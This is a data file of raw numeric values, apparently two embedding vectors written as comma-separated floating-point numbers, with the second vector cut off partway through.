-0.021511955,0.006281751,-0.007206649,-0.00013760386,-0.0077577783,0.006985658,0.049957026,-0.014454772,-0.022063315,-0.006211608,0.08457452,-0.014048322,-0.013353441,0.00291938,-0.0073182946,0.0063610068,0.02532453,-0.016786082,-0.021174328,-0.013038639,-0.044047024,-0.010490298,-0.0042582303,0.011643163,-0.019003509,0.021426095,-0.006174047,0.013926356,-0.004498072,-0.00406857,0.014487481,-0.006488608,-0.00456281,0.03897717,0.013624461,-0.0106818145,0.011080915,0.011834393,-0.01673476,-0.0033683532,-0.010683653,-0.008554576,-0.013167974,-0.0071135284,0.010234645,-0.055604197,-0.023195783,0.005251484,-0.00015544938,-0.008617373,0.0053094532,0.0019350507,0.0017306412,-0.021456596,0.013622944,0.016163616,-0.02406526,0.0208875,-0.0008031712,-0.010308,-0.0008416331,0.009601518,0.029461643,-0.027038675,-0.00890308,-0.020049468,0.013443635,-0.003692203,0.0014891233,-0.0017814377,0.012424815,-0.013516974,0.00053033384,-0.018744541,-0.00819694,0.0027127918,0.007041464,0.007665259,0.009760174,0.03192915,-0.0050040744,0.008112647,-0.00036314188,0.0077120215,-0.002657238,-0.0049660862,-0.018473255,-0.026835555,-0.039489012,-0.016447112,0.012105795,0.009491652,0.0032899983,0.029325822,-0.019421116,-0.062401313,0.0037090294,-0.009859406,-0.032649558,0.014381361,0.0083062695,0.010947158,0.02630064,-0.0006766667,0.02345402,-0.02086923,-0.00632471,-0.0016580512,0.0036683786,0.004109281,0.019611396,0.01861306,-0.019897992,0.004604248,0.01640202,-0.038513184,0.011784971,0.002287626,-0.0015714965,-0.028380848,-0.015928797,0.006781076,0.028887957,-0.024603311,-0.00917313,0.046898644,-0.006109739,0.0015385549,0.006564501,-0.016516065,-0.012412795,-0.012442477,0.007679859,0.0022603706,0.021230007,0.011175203,0.0020785471,0.01885952,-0.013785429,0.019752244,-0.014578081,0.0330665,0.0022777875,0.013643569,0.016467195,-0.008706152,0.014060848,-0.012417169,0.007859904,-0.002813358,-0.0033296174,0.017312907,0.0063045253,-0.012787322,0.0014306223,-0.0034838319,0.00872488,0.018499685,-0.010259119,0.0042096623,-0.0025558136,0.011720234,0.00012379048,0.0065580886,-0.0011984062,-0.00038474,-0.004780889,-0.006014738,0.00089679565,0.00032740753,-0.026262863,0.012636288,0.011632024,-0.014208416,-0.030518072,0.03175269,0.03195771,-0.01200777,0.021278221,0.0020894047,-0.021043377,-0.012203323,-0.01027622,-0.000036531565,0.0015424851,0.009646574,0.0034971235,0.0051037394,-0.019893384,0.0034654245,0.030501999,0.023556443,-0.021506194,-0.0110142045,-0.012136537,-0.0069525507,-0.015793132,0.017537385,-0.018596826,0.007106531,0.0018669295,0.006596671,-0.000038237114,-0.005452452,0.0064761634,-0.011499048,0.027578231,-0.003757952,0.001545323,0.006971676,0.002657887,0.042440977,-0.01337996,-0.026758129,0.011468139,-0.0035399767,-0.036195647,0.0055067907,-0.011257063,-0.008566856,-0.013906912,0.007928653,-0.01292731,-0.01496305,0.019757085,0.008091715,0.011280765,0.010496635,-0.008205026,-0.023935903,-0.005222175,0.003294977,0.019372992,0.022857139,-0.033308055,-0.01493567,-0.03079508,0.0651052,-0.0039458578,0.0034399095,0.015199129,0.029639231,0.040946595,0.0029334757,0.0054052626,-0.019680832,-0.0003250312,-0.0122148115,-0.037636623,-0.0066498485,0.009916799,-0.0119443,-0.0179398,0.011924623,0.0029311413,-0.024132073,0.005801337,0.009443329,0.008385415,0.0016041505,-0.013419393,0.007099582,-0.04837608,-0.005990622,0.008908688,-0.034223545,-0.0017746049,-0.009305779,-0.019890198,-0.007545802,0.0013860761,0.014629872,-0.0009580504,-0.012517173,-0.003842751,-0.001802574,0.014816592,0.009414839,0.004875625,-0.0013278977,-0.0037915101,-0.024003953,-0.014164663,0.021168318,-0.011898382,-0.004966147,0.015731523,-0.01238056,0.027641714,-0.000720647,0.009826577,0.025198383,-0.0069489465,-0.0061726696,-0.0033118841,0.010664718,0.020065986,0.011180214,-0.032424774,-0.018355211,-0.008341619,0.026548587,0.021069339,0.0068428605,-0.0224263,-0.0070081423,0.015183457,-0.01969409,0.03444066,-0.00028837597,0.013720497,0.0052071405,0.0008198622,-0.001252975,0.00090522383,-0.00627845,0.0052539585,-0.011909925,0.0031968749,-0.005332215,0.00087345496,0.008204044,0.015850885,-0.01424209,0.008595253,-0.011982346,0.0052901097,0.013929791,0.0050434386,-0.02361328,-0.0076154205,0.0044740858,0.0071300385,0.008780542,-0.002752804,0.02606259,-0.03299192,-0.008999177,-0.0133457715,0.010595979,-0.0012625566,-0.000509089,-0.0062395837,-0.10684235,0.011960805,-0.022765692,-0.0057799653,-0.017445775,-0.0014668935,0.018320667,0.08166806,0.010596648,-0.050332297,-0.00036602654,0.028954217,0.01620706,0.009753289,0.0021258024,0.011416396,0.0061039967,-0.013508772,-0.013662181,0.0075415764,0.011836885,-0.0075446097,0.012255815,-0.00035969124,-0.011467345,0.025476044,-0.018680252,0.0044653458,0.019470628,0.032321084,-0.004609664,0.0015757714,0.00034280933,0.028274952,0.00104557,-0.011900438,-0.013056073,-0.0023568438,-0.0013818655,0.008068972,0.012969895,-0.007150152,-0.0033472697,0.023970662,0.00065925665,0.00031265462,0.014657444,0.005424007,0.019063879,0.006038888,0.0076321107,0.0013208431,0.029460015,-0.0067087533,0.016892634,0.0027550224,-0.015954336,0.021798898,-0.0010774805,-0.010303714,-0.0019573837,0.035695065,-0.00072884583,-0.017079305,0.00041559653,-0.0038130884,0.005795028,-0.02136992,-0.0083503295,-0.0014198504,0.0028512047,0.011049154,-0.0065698125,-0.008404886,-0.013945805,-0.0035348057,0.023528913,0.016139336,0.008747309,0.010877467,-0.0075255823,-0.01830126,-0.0078230025,0.013427755,-0.0010132178,0.015302236,0.008584368,0.0060088565,-0.0128911,-0.018369649,-0.0037910303,0.008773238,-0.0073579545,-0.014273721,0.007010856,0.016893934,0.0055468203,0.028761026,0.00737306,-0.017645774,0.010404592,-0.008589248,-0.0091300635,-0.012800558,-0.10185879,-0.0070130904,0.027691944,0.0034559746,-0.0139300665,-0.014462597,0.0017075248,-0.007315944,0.0010607309,0.0027455331,-0.0037627472,0.026367314,0.0098818615,-0.0017818398,0.0070996727,0.001671976,-0.03337536,0.020631585,-0.0021336987,-0.008094256,0.007153469,0.0061323526,-0.04411519,-0.007270336,0.009244524,-0.0072142524,-0.0050024013,0.014493732,0.031167135,-0.011042365,-0.012141031,0.0203352,-0.02506427,-0.00031674252,0.0066633974,-0.04104925,0.016887588,0.00017994629,0.011396084,0.0071791806,0.0071414127,-0.028710136,0.011016799,0.020703992,-0.007297129,0.022676416,0.009580382,0.0054892018,0.011318024,0.017148662,-0.0027578636,-0.0035063494,0.0015905346,0.014861215,0.011039092,-0.0044346373,-0.021571577,0.008852559,-0.02465342,0.016357014,-0.020955546,0.0010651681,0.005452995,-0.0012653479,-0.012785312,0.03433673,0.02486988,0.0088149635,0.009802747,0.0051770047,-0.022846634,-0.012762517,0.011887115,0.0074482085,0.0060318233,0.020645743,0.007725009,0.031421587,0.02066944,-0.0010626866,-0.0012339307,-0.0107942885,-0.005213453,0.026221499,-0.0019196119,0.0035214855,0.009937821,0.008485094,-0.012798686,0.016443957,-0.022556026,0.025445119,-0.024638236,-0.0071071787,0.009256974,0.023215888,0.020921804,0.022229506,-0.020829301,-0.004153409,-0.04750893,-0.012411848,-0.014485676,0.028090544,-0.0058561615,0.009963229,-0.015525297,-0.00020499477,0.006854892,0.017993463,0.033271644,0.0047734906,-0.019683283,0.01573517,-0.028421367,0.00011879534,0.009353217,-0.016016707,0.00033525538,0.011103809,-0.025224313,0.006560307,0.0085649155,-0.026697092,-0.016173376,-0.0018854379,-0.016654376,0.031516027,-0.00054850866,-0.02430255,-0.015404114,0.015347575,0.02279523,-0.030007048,-0.024656963,0.019403525,0.0043689497,-0.005228651,0.031850863,0.01556894,0.003776923,-0.004515179,0.027369782,-0.009345391,-0.006663281,-0.009100508,0.007506728,0.020265432,-0.0038849008,0.016122527,-0.013596265,-0.010421342,0.019406442,-0.010067158,-0.015925424,0.010544109,-0.010959226,-0.0030847203,0.0027516836,0.0036672277,0.008992271,0.0022786683,0.008831594,0.020830635,-0.0050240336,-0.004193429,0.0024462782,-0.0025603452,0.0037474975,-0.010358894,-0.005512159,-0.016622016,-0.015362233,0.0050890488,0.022964977,0.007327176,0.042260394,0.023375535,-0.0025746932,0.032483637,0.020636946,0.0007890244,-0.024289224,-0.0004032722,0.035501514,0.0066748797,-0.021503525,0.00033695833,-0.014446865,0.004344007,0.027793825,-0.011488469,-0.027342627,-0.007534944,0.0048936075,-0.010811603,-0.006585012,-0.0007483789,0.024659809,-0.0093654515,-0.013470091,0.022194587,0.009876824,-0.0033809056,0.0013089199,0.00584114,0.0033259818,0.027249066,0.03608274,-0.015290523,-0.015346896,0.0006284578,0.0062485146,-0.002957339,0.014671551,0.018638896,-0.018153999,-0.02248494,0.01553267,-0.0074757235,-0.0034234615,0.003143924,0.0020565188,-0.01699755,0.0006580845,0.029266512,0.016140472,0.0134112835,0.0080974605,0.0030938687,0.0053211255,-0.005852153,-0.0026150544,0.019011397,0.011084442,0.0055235606,0.01640008,-0.0104590235,-0.0022258013,0.0017775575,-0.011207035,0.012755117,0.011432627,0.025292095,-0.009781266,-0.0015597735,0.025109416,-0.0037601434,-0.02076254,0.00833019,-0.000061053535,-0.025722055,-0.014998017,0.0058523645,-0.014548078,-0.002025806,0.041246556,-0.007231253,-0.0128743835,0.010505,-0.016365021,-0.006500129,-0.01468041,0.011934329,-0.008362526,-0.013253881,0.009516476,-0.020586945,0.003192728,-0.006062659,-0.010055687,0.02131165,0.0064660623,0.007372558,0.026727416,-0.007678544,-0.0031595984,-0.025113858,-0.00082785037,-0.00039085295,-0.0012484802,-0.027034303,-0.00965407,0.0031740258,-0.001197994,-0.0068693403,0.005470941,-0.0058584474,-0.0042058374,-0.000037289585,-0.0148653425,0.020023672,-0.014808665,-0.014195176,-0.02248143,0.018866835,0.023158032,-0.00058412185,-0.0032202147,-0.009796458,-0.0012108602,-0.009685037,0.014754193,0.02372182,-0.011174562,-0.015592945,-0.0010590089,0.043884125,0.0029329846,-0.008314657,-0.0054640956,-0.007364007,-0.013231237,0.015095051,0.011280293,-0.010254492,-0.031152925,0.005847951,-0.033317078,-0.020003147,-0.005916049,-0.042705614,0.010700047,-0.0119956825,0.0024057503,0.002935255,0.023689695,0.014437195,-0.004838191,0.005404047,0.030187417,0.034815054,-0.017811555,-0.004005593,0.008054777,-0.004648327,0.0032976067,0.021348324,0.00037888362,0.022576753,0.00047524797,-0.0021049595,-0.016036905,-0.026452009,-0.0037308934,-0.00020242792,0.008226061,0.006041499,0.015574853,0.0064282096,-0.019102277,-0.0025848811,-0.02861502,0.017510215,0.007133802,0.0048240055,-0.0026569762,-0.01659379,0.0062810644,0.0142176105,0.0018881516,0.005669852,-0.0034037242,0.0010795689,0.00789075,-0.0004426625,-0.0056200027,0.017656868,-0.0046252212,-0.007475401,-0.0130206505,-0.007822755,-0.027370036,-0.01474292,-0.004891289,-0.08883298,0.021737643,0.010501851,-0.010657314,0.015140078,-0.007130042,-0.007233979,-0.004864397,0.025297068,0.014906951,-0.024922324,-0.00017724166,-0.009089242,0.0062886667,0.010133443,-0.0047196923,0.009986532,0.013332159,0.012773154,-0.028865516,-0.02295993,0.036363028,-0.0038095596,-0.0048071095,0.013477357,-0.0009545786,-0.011173845,0.0036835049,-0.012033139,0.01143824,0.00012400233,0.006308255,-0.0057662637,-0.018117037,-0.0039239856,0.002043753,0.00760646,0.009256592,-0.002540988,-0.034006998,0.011395533,0.008664509,0.0052722166,0.009994084,-0.011880479,0.022469172,-0.027772523,-0.010413735,-0.017673872,-0.0038339328,0.0022219734,-0.0037104916,-0.020387549,0.021061221,0.009241469,0.010130558,0.011891776,-0.0035868003,0.029387511,0.0021782378,0.0004820977,-0.01826411,0.038200844,0.010267176,0.003933498,0.014157355,-0.010859901,0.016554702,-0.03213958,0.0036969392,0.021241741,-0.012470391,-0.02815821,0.012016505,-0.0024741727,0.0207566,-0.015193305,-0.016887976,0.011657383,0.0037426117,0.041513976,-0.0061830543,0.0062949816,-0.018985849,0.008146609,-0.0031113164,-0.02258433,0.026441133,0.029080594,0.025976466,0.0063262773,-0.019797748,0.02996634,-0.008453171,-0.016199186,0.003852098,-0.004360958,-0.0047843624,0.0046737795,0.015352091,-0.021309182,0.009194932,0.017053232,0.0006373707,0.015187779,0.012028048,0.0034451701,0.011010935,0.0065210885,0.013895568,0.009407745,0.018410752,0.052215274,0.0066096536,0.010626155,-0.0062574605,-0.0025249447,0.0075098127,-0.024945764,0.0031720088,-0.025548741,-0.0172561,-0.026631488,0.020344814,-0.0063684387,0.002293339,0.0021126296,-0.0059345257,-0.0021795414,-0.00041179007,-0.030717233,0.013848296,0.01905466,0.026339829,0.007823988,0.007786276,0.043495934,-0.001589251,-0.032717362,0.004889424,0.007563427,-0.054495882,0.0018646003,0.01268499,-0.009128205,0.05029887,-0.018606814,-0.004686198,0.007521671,-0.016764592,-0.017714541,0.023440562,0.0076286844,0.0040946547,-0.003284565,0.013457201,0.0029178925,-0.0012471097,-0.012901792,-0.021879904,0.008307059,-0.00023519275,0.025252927,0.00021627174,-0.023336856,0.005908102,0.012872553,-0.008294021,-0.010352668,-0.044712126,-0.017730433,-0.026574094,0.008153542,-0.003108883,-0.015296231,0.019381398,0.03178508,0.022645997,-0.009166408,0.002628439,-0.008729153,0.017528335,-0.0051061986,0.00038672343,-0.029481897,-0.017306415,-0.0019407278,0.007870163,-0.0030624901,-0.023311181,0.0047447826,0.0034694704,0.015585235,0.012744139,-0.017985124,-0.019605359,0.0053018257,-0.013848194,0.006754557,0.012711835,-0.0286774,0.009881526,-0.002925545,-0.0038447178,0.017721338,0.015625505,0.010551921,0.0045031817,0.013605315,0.028948955,0.009565343,0.02242828,0.002369996,0.08330929,0.019895166,0.015264942,0.0011023994,-0.008340591,0.0016434457,0.037348364,0.0011765555,0.004444385,-0.0034441417,0.017545927,0.005823018,0.0077795605,-0.009719348,-0.013933119,0.019364284,0.01879986,0.009588031,0.013838172,-0.024657836,0.01371229,-0.04294611,-0.009742455,-0.0071357987,0.0175232,-0.049704522,0.015818134,0.023249492,0.0017498148,0.0221117,-0.010022982,0.02530167,0.021896236,-0.0006800314,-0.01461781,-0.014781389,0.014588576,-0.0086435005,0.00041120886,-0.02500955,0.0029049832,0.0241729,0.0067495187,-0.008227447,-0.023006912,0.012822107,0.015502778,-0.019246906,-0.0018801983,-0.0044112685,0.0059076785,0.013733497,0.020152686,-0.0039223116,0.020453108,-0.0023893232,0.0035767206,-0.0021896346,0.0038940636,-0.0034228824,0.026084026,-0.0001795623,-0.005282867,-0.0043899263,0.013487241,0.01311559,-0.0076297293,-0.009959362,-0.01754547,-0.010839444,0.033925753,-0.018229635,-0.011217209,0.0053273053,-0.029211126,0.02413923,-0.013845388,-0.007942625,-0.0038970464,-0.009610152,0.014826308,0.009336006,-0.01689252,-0.03466688,-0.007900673,0.009441264,-0.020533966,0.025197515,0.0020765576,-0.0034681407,0.013909384,0.018238055,-0.008294506,-0.008622849,-0.0083354395,0.0065844567,0.036291435,-0.0020445548,0.0034109598,0.0032082864,0.0020116002,0.013149495,-0.025906878,0.010103396,-0.008506609,-0.0037276286,0.014736741,0.026144342,0.008934397,0.009571187,-0.0032844965,0.010296429,0.012622019,0.0060506864,-0.000015734937,-0.026855912,-0.008302244,-0.029701062,0.026415693,-0.004999497,-0.009877798,0.010983497,0.008559301,0.026392702,0.014630681,0.0080414275,-0.019479992,0.008061203,-0.00051240035,-0.007294221,-0.030764127,-0.040172264,-0.02508094,0.013498988,-0.0071526673,0.021813238,0.009392473,0.023102233,-0.010693324,-0.006153709,0.037840158,-0.010883923,-0.0074526905,-0.00009512749,-0.006063179,0.008787045,0.022117121,-0.0009440633,0.012244957,-0.0049463077,-0.0006873582,0.009715115,0.0019625083,-0.011355985,-0.014020442,-0.0025822064,0.019510483,-0.014185775,-0.008564396,-0.0097051,0.0026564728,0.008355857,-0.008543473,-0.045278933,0.015300606,0.017946512,0.0046088453,-0.012710335,0.011471493,0.010992164,-0.007713263,-0.005007358,-0.021174148,0.0041513382,-0.002695677,-0.021315346,0.013606742,-0.0058148494,-0.0133635625,0.002675356,0.026498951,0.007376504,-0.013478549,0.014641743,-0.008754082,-0.02308132,-0.0014609533,0.00054417725,0.012097934,0.050726157,-0.015581745,0.03022844,-0.010825357,-0.00012108016,0.017679859,-0.0146793015,-0.034534637,0.026270209,-0.015650801,-0.05159836,-0.0070976177,-0.0016741678,-0.006521224,0.033995636,0.013998755,-0.018849416,0.006304877,-0.012793121,-0.020663235,-0.014691968,-0.0012521754,0.008216853,0.010044777,-0.021186883,0.00008438194,-0.014552292,-0.02877291,-0.008374407,-0.019162549,0.0068104644,-0.0057974984,-0.020249026,-0.0030889465,0.0041928673,-0.0070288605,-0.037165463,0.012524967,0.019099707,0.010495904,-0.009244802,-0.0013131212,0.021299494,-0.0128198825,-0.004431475,-0.024902437,-0.005505885,0.009437567,0.0016696383,-0.009225528,-0.0036316882,-0.01089981,-0.0073833396,0.0056056106,-0.0056112274,-0.026381256,-0.010502421,-0.0008037832,-0.020915475,-0.016736073,-0.04141541,-0.018465124,0.028110487,-0.030546943,-0.020943083,-0.008994077,-0.022680141,0.0051328624,0.0022308177,0.026776861,-0.01186557,-0.013112378,0.0060292957,0.0026404462,0.0055240593,-0.0046758973,-0.009991521,0.0049351123,-0.017975463,-0.0018617051,-0.007843321,-0.0093660755,-0.0070754536,-0.022619512,-0.005545896,-0.013762952,0.008169486,-0.023173297,-0.0011328001,-0.014728274,0.018949473,-0.0056048604,-0.01673153,0.04231808,-0.02197229,0.014301769,-0.017027818,0.0012192469,0.006362098,0.056539085,-0.027878018,0.011191675,0.04523443,-0.0065602674,-0.022973046,-0.0075709885,-0.0139289405,-0.08407258,-0.02619927,0.033146296,-0.013085941,-0.0377428,-0.005074183,0.014406597,0.02330562,-0.010185137,0.0009194114,-0.00008648955,0.002640988,-0.004503101,0.018813778,-0.015483174,-0.00096547056,0.0070203897,-0.005628498,-0.006915542,-0.0010175727,0.005905269,-0.0028397653,0.0029692266,0.005227284,0.026353566,-0.025087953,-0.006654577,0.0068484023,0.002797956,-0.00255118,0.006856025,-0.024433905,-0.027460082,-0.019773116,0.012340919,-0.0070127426,0.0010472357,-0.0035359317,-0.0023765273,-0.003373225,-0.0032414636,0.14262804,-0.0033929609,0.003558481,-0.023404788,0.004143683,-0.013673383,-0.0070436737,0.009969444,0.004481921,0.0075122304,0.0010021516,-0.012161702,-0.0097714085,0.02272691,0.006667343,0.0026913402,0.012866698,0.1706187,0.012732849,0.0023124844,0.022023177,-0.0021684873,0.018068025,0.009879919,-0.014012181,-0.042794883,0.0033097577,-0.01152551,0.013243503,-0.006514327,-0.010795242,0.0043097516,0.0078094453,-0.0035894068,0.0007074417,0.008374015,-0.009460087,-0.019781893,-0.03672686,-0.011622427,0.013066186,-0.007249328,0.0022051353,0.015980558,-0.0046804873,0.00037261518,-0.0094638,-0.008923866,-0.0016482893,0.027010908,-0.01392568,-0.00843875,0.013591941,-0.00786488,0.00019477631,-0.006231542,0.0025970328,0.029132763,-0.027732257,0.015469065,0.010836378,-0.0074314754,-0.0022031914,0.011105211,-0.015699264,0.0101966,-0.0016480662,-0.013395448,-0.0069114715,0.005904889,0.0058099255,0.008819268,-0.005901061,0.011579763,0.021018129,0.0052690837,-0.021096742,-0.019757414,0.017417107,-0.018075015,0.0056899567,0.018026052,-0.0036135719,-0.013502645,0.00013030542,-0.012950559,0.0022917285,0.0025560812,0.0069216406,0.0023003262,-0.019241018,0.01522158,-0.0004653993,0.0028249493,0.0027683605,0.01679047,-0.0039367815,0.00056762167,0.010320846,-0.032841057,0.012263841,0.0021461654,-0.0048203506,0.021113677,-0.0037654806,0.020352978,-0.008216194,-0.007969237,-0.01073681,0.011478759,0.019446881,0.014697782,-0.012594495,0.0001847316,-0.025539922,-0.012553217,-0.009437679,0.023096496,-0.020088952,0.01768779,-0.014037639,-0.0044583683,0.008847968,0.027716167,-0.031152966,-0.0069386084,0.0053304853,0.009902945,-0.022324018,-0.0005567995,-0.020995308,0.0037512316,0.014707331,0.0120382,0.010419768,0.0005154343,0.012933388,-0.019920634,-0.021571297,-0.014148262,0.008071835,0.020107666,0.0023637563,0.015452794,-0.020577673,-0.0046651377,0.020241538,0.0057187886],[0.008081261,-0.005566952,0.010440258,-0.010067033,0.0015428187,-0.012602544,-0.004390957,0.008706768,0.025060292,-0.011304494,0.013905027,0.034727268,-0.024095614,0.0126014585,-0.012661329,-0.00017994587,-0.012993691,-0.011222307,0.0025349066,-0.008915299,0.01016411,-0.011726248,0.017157936,0.0016080226,0.01121651,0.009074871,0.0025328356,0.005838962,0.012335899,0.00050584855,0.003117364,0.020906074,0.0064414795,-0.014771732,0.018446656,0.0064528636,-0.016281543,-0.006037724,0.0045283823,-0.00506274,0.0010418008,0.01635591,-0.0067053316,0.0026980913,-0.008652488,0.008309767,-0.012640487,0.0037206046,-0.017492771,0.009187151,0.000054713495,0.013347363,-0.012330106,0.029695626,-0.012609547,0.008546158,0.011606742,-0.037889548,0.0039579477,-0.007880269,-0.024896694,0.014933214,-0.014035239,-0.0052125356,0.03908279,-0.006260449,0.0032655823,-0.025323488,-0.025405768,-0.014871485,0.014888326,0.0018174838,-0.0025794583,-0.006380206,-0.003870879,0.023405163,-0.02124284,-0.008109943,-0.011773732,-0.00814729,-0.035082392,0.0024682293,-0.0008674301,-0.0068770135,0.00796538,0.002500014,-0.0051923613,0.004886296,-0.0025925615,0.0001249644,-0.0141756665,-0.016767874,0.0064976895,0.01205966,0.0038168116,0.0077306675,0.022353891,-0.023263397,-0.015240627,-0.006219478,-0.020452496,-0.015993055,-0.02607897,0.00994688,0.015614612,-0.016231218,0.004696176,0.011302892,0.013614757,-0.0060333326,0.0009515371,-0.007766668,0.0044027306,-0.0036839817,-0.009308112,-0.013914292,-0.008985144,0.008247526,0.012326634,-0.0015312125,-0.03746755,0.016967261,0.021603685,0.0011257511,0.0038969917,0.004003409,0.011300756,0.0052174735,-0.00023888322,-0.00559416,0.0007615823,0.030938823,-0.0026246768,0.006022458,-0.00085627945,-0.012822916,0.0031255155,0.010843465,0.0073323403,-0.0053803604,0.0072586867,-0.0042241355,0.031754695,0.014906844,0.027064905,0.024602644,-0.0030090697,0.022537014,0.006715527,0.01592183,0.0049884054,0.0147442175,-0.018271051,-0.017249813,-0.01128208,-0.003557237,-0.020686502,-0.0102557,-0.0073086023,0.018534414,-0.015033291,0.003879498,-0.0034077324,0.011264553,-0.01408851,-0.014845835,-0.010649572,-0.00009727374,-0.015135496,-0.014892927,0.007072026,0.0026787515,0.015819263,0.0067759,0.0009968351,0.010640811,0.0049550016,-0.0060512996,-0.021168085,0.0023043954,0.014111297,0.0029171188,-0.022190876,0.006896576,0.013936769,0.013477838,0.041693594,0.006021333,-0.0021033746,-0.0028193877,-0.010463494,0.00074111525,-0.013980999,0.0056883665,0.0007337376,-0.023277782,-0.009215636,0.119153425,-0.019551076,-0.020456413,-0.0071370276,0.008541836,0.0171631,-0.008518948,-0.0040533836,-0.009201471,-0.011297174,-0.007845596,0.0069560683,-0.008065845,-0.011476693,0.0047965795,0.015775831,0.009859487,0.02606856,-0.055797674,0.008196349,0.020536497,-0.012275227,-0.008041281,-0.003710715,0.013918094,-0.0038067035,-0.0051014186,-0.011802241,-0.014553185,0.026999956,0.003956378,-0.0057159504,-0.0056373915,0.037452653,0.012080003,-0.045054033,-0.023189912,0.0016626848,-0.016815217,0.022532849,-0.004065018,0.009575598,-0.006710985,0.005333576,-0.0024553796,0.024280908,0.020740904,0.0010309857,-0.0053797197,0.023962239,0.028362108,0.02091651,-0.00289924,-0.0005269254,-0.012469861,0.012789656,0.025445005,-0.013315371,-0.0013351497,0.007864929,0.015926745,0.0073566535,0.024042726,0.0008598749,0.0187911,-0.015679795,0.012334674,0.019130256,0.0056013,0.01578873,-0.037026025,-0.024832979,-0.03368717,-0.03253041,0.009229732,0.0029116771,-0.024839727,0.009151531,-0.010044155,0.017708685,-0.014241965,0.000071419236,-0.0024518615,-0.0017676009,0.0009788093,-0.0093035195,-0.03384825,-0.028785596,-0.000111130445,0.019263793,0.0018417429,0.023648795,-0.0064063375,-0.015412902,0.01789884,0.0042116707,-0.009571138,-0.013917734,-0.0017001602,-0.010133929,0.0145205725,0.015617341,-0.0053462903,0.009947738,-0.0024445804,0.031847324,0.01597426,-0.015967382,0.0014003027,0.01417655,0.018457636,0.0020268492,0.034995876,-0.01088533,-0.012234941,-0.0047117067,0.020105755,-0.00454385,0.0029889636,0.0069117467,-0.013541046,-0.0034997666,-0.0060447208,0.0207989,0.013060646,0.0022757452,-0.034444354,0.0010598794,0.0020914304,0.020210272,-0.0024113555,0.025276273,0.015471068,0.0009971005,-0.011643528,0.015539255,0.012180907,0.0084755,0.011913494,-0.0023656061,0.010222456,0.0075363945,0.014512641,-0.02234314,0.008849226,-0.008232581,-0.0047671446,-0.0028617634,-0.011872985,0.0023573178,-0.006998357,0.02082825,-0.0030200747,0.007971973,0.001953394,-0.013419059,-0.0031810198,0.007415603,0.003123947,-0.0097475145,-0.00089789246,-0.006600326,-0.017977009,0.025982132,0.008651266,0.015904682,0.0018924042,0.07475837,0.00070015725,0.01406011,0.014643192,-0.017405007,-0.009050239,0.038049575,0.015185887,-0.0028650723,-0.022642674,0.0039734943,-0.0075601772,-0.0076609817,0.009866316,-0.018031504,0.010862674,-0.016808452,0.0040114527,-0.0060909637,-0.026248308,0.035796642,-0.014286058,-0.006524777,-0.00686699,0.0028231298,-0.0022949618,0.005692464,-0.007196425,-0.019106867,-0.017340304,-0.00639672,-0.027055163,-0.0152459955,-0.012920603,-0.03674327,0.01712536,0.007597053,0.0057630576,-0.013876407,-0.010046859,-0.0031462442,0.004851483,-0.02905171,0.0025536534,-0.017085064,0.020417582,-0.00077074725,0.007181218,-0.013916421,0.008152782,0.010032801,-0.011964042,-0.016961835,0.03153612,-0.0111016845,0.00999994,0.016815733,-0.041122094,0.029440338,0.023092607,0.005673632,0.024505895,-0.034004718,0.010404282,-0.014402127,0.035710286,-0.002044677,-0.019117557,-0.0012865214,0.016529098,-0.0006411527,-0.00077913306,0.007632429,0.003540993,-0.010243644,0.011762787,0.0032752932,-0.006031524,-0.0068918774,-0.016276494,-0.0018949946,0.013375099,-0.0076848282,0.003448829,-0.0034301458,-0.0068643615,0.012198217,0.019183986,0.009563801,-0.021252057,0.010223408,0.005192755,0.014015544,0.0026887613,0.008285688,-0.005060617,0.028482432,0.0003277459,-0.013715676,-0.0072346064,-0.02317132,0.015988076,-0.008477555,-0.009314869,0.009062694,0.00041411567,-0.00084134436,0.0009741246,0.0067279283,0.033379517,-0.0318014,0.000015214527,-0.018714603,-0.00588423,0.006968169,0.0005748547,-0.018333007,0.0055995034,0.0104259495,0.027637579,0.020152207,-0.0018771861,0.015567095,0.012406323,-0.0074216756,-0.0024071336,0.010065728,0.002359846,0.026060533,0.016485196,0.011454481,0.026159571,0.008532994,-0.031381976,0.003389505,-0.0001256259,0.018293343,-0.015672889,0.023497272,0.0039894246,0.026569193,0.012224851,0.020178715,0.0037774327,0.0032701273,0.016692245,0.02379471,0.0023267784,0.017295659,-0.012562986,-0.0023495639,0.0051171132,0.011680143,0.0011705424,0.000344812,0.01638266,0.01398993,0.0014100142,-0.019565197,-0.022813965,0.034086358,-0.019783992,0.0044491487,-0.021413691,-0.010950868,-0.009562502,-0.0022704205,0.09200662,-0.0037522162,-0.02393075,-0.0057158316,-0.010158821,0.009805315,-0.00050204626,0.009381886,-0.012600673,0.028511671,-0.00022399312,0.014526503,0.018071812,0.028263813,-0.013805477,-0.01904675,-0.0025865645,0.0021642533,-0.00282122,0.008736923,0.027981585,-0.00887855,0.0061158882,-0.035303984,-0.010668931,0.0021067194,0.0035329873,0.0073517896,0.0020215192,-0.0077229515,0.003499475,0.0008701527,0.011137881,-0.011570301,0.004905316,-0.00048920844,-0.0006242731,-0.0057194894,-0.014627609,0.035623834,0.0070127384,0.005094492,0.0145266885,0.028794339,-0.0018896863,-0.014141819,-0.02565923,0.008837838,0.021332595,0.0039321217,-0.007241005,0.0134858675,0.017047625,0.009978582,-0.0064515024,-0.0058683315,0.014818705,0.016310768,-0.00919734,0.00778249,-0.0053165546,-0.00046381893,-0.007745938,-0.0019340903,-0.020461898,0.010392129,0.0038357573,-0.0038054565,-0.00014132597,-0.02815084,0.031287976,0.013745981,-0.004445217,-0.013629047,0.032132693,-0.0035946828,0.009179056,0.020076508,0.016818076,-0.022811098,-0.013868502,0.01188641,0.0060651037,-0.0198356,0.0051824832,0.019411067,-0.021063238,0.005684757,-0.00050007435,0.001544447,0.00843672,-0.007917716,0.007579799,0.0066847317,-0.0038360353,0.017245648,0.0065505453,-0.018732172,0.011117554,0.009894417,-0.009147942,-0.0032607787,-0.013579955,0.046432402,-0.007948317,0.004278759,0.009729614,-0.00052213995,0.0010848262,-0.042662878,0.00021993778,-0.062042993,0.020406641,0.019812392,0.016276529,-0.0150664,0.037152745,-0.008657211,0.019616261,-0.012463107,-0.009750761,0.004318545,-0.0046245973,0.0017240599,-0.0029832937,0.014920447,0.018777166,-0.0352743,-0.008898266,-0.002010657,-0.042566996,-0.00094192685,0.031020472,-0.003020587,0.011343409,0.02074886,0.01111126,-0.006364271,-0.015782144,0.004129624,-0.010407781,0.0036230534,0.011899709,0.011564831,-0.0016173363,-0.014215279,0.008033363,-0.013544474,-0.012204637,-0.002967966,-0.0012590201,0.0059067127,-0.015196323,-0.012554217,0.0057406854,-0.023676798,0.019542